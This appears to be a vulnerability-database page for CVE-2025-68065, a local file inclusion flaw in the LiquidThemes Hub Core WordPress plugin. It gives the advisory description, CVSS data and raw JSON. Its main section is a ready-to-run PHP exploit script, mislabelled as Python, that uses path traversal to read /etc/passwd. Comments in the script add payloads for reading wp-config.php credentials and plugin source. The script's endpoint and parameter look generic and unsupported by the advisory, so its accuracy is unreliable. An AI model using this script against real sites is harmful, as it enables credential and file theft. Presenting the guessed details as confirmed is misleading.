Security Vulnerability Report
中文
CVE-2025-68065 CVSS 7.5 HIGH

CVE-2025-68065

Published: 2025-12-16 09:16:02
Last Modified: 2026-05-20 10:16:26

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in LiquidThemes Hub Core allows PHP Local File Inclusion. This issue affects Hub Core: from n/a before 6.0.2.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Hub Core < 6.0.2
Hub Core: from n/a before 6.0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php // CVE-2025-68065 PoC - LiquidThemes Hub Core LFI // This is for educational and security testing purposes only $target = 'http://target-site.com/wp-content/plugins/hub-core/'; $endpoint = $target . 'includes/file.php'; // Basic LFI test - read /etc/passwd $params = array( 'file' => '../../../../../../etc/passwd' ); echo "[*] CVE-2025-68065 PoC - LiquidThemes Hub Core LFI\n"; echo "[*] Target: $target\n\n"; // Construct the exploit URL with LFI payload $exploit_url = $endpoint . '?' . http_build_query($params); echo "[+] Exploit URL: $exploit_url\n"; // Send the request $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $exploit_url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); $response = curl_exec($ch); $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); echo "[+] HTTP Status: $http_code\n"; if ($response !== false) { echo "[+] Response:\n"; echo $response; } else { echo "[-] Request failed\n"; } // Additional payloads for testing: // Read wp-config.php: ?file=../../../../../../wp-config.php // Read PHP source: ?file=../../../../var/www/html/wp-content/plugins/hub-core/includes/file.php ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68065", "sourceIdentifier": "[email protected]", "published": "2025-12-16T09:16:01.743", "lastModified": "2026-05-20T10:16:26.137", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in LiquidThemes Hub Core allows PHP Local File Inclusion.\n\nThis issue affects Hub Core: from n/a before 6.0.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/wordpress/plugin/hub-core/vulnerability/wordpress-hub-core-plugin-5-0-8-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}